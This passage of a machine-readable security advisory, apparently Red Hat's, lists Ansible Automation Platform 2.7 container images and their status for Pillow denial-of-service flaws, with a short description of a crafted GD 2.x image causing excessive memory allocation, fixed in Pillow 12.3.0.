"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted BDF font file"
},
{
"cve": "CVE-2026-55380",
"cwe": {
"id": "CWE-1285",
"name": "Improper Validation of Specified Index, Position, or Offset in Input"
},
"discovery_date": "2026-07-06T20:01:42.245051+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497455"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing a specially crafted GD 2.x image file. The GdImageFile._open() function reads image dimensions without proper validation, leading to excessive memory allocation. This can result in a Denial of Service (DoS) due to C-heap exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A denial-of-service vulnerability was found in Pillow\u0027s GdImageFile plugin. The GdImageFile._open() function reads image dimensions from GD 2.x file headers and stores them without performing a decompression bomb check. A crafted .gd file of approximately 1 KB can trigger an unchecked 4.3 GB C-heap allocation, potentially crashing the process or exhausting memory on systems with insufficient resources. This issue is fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
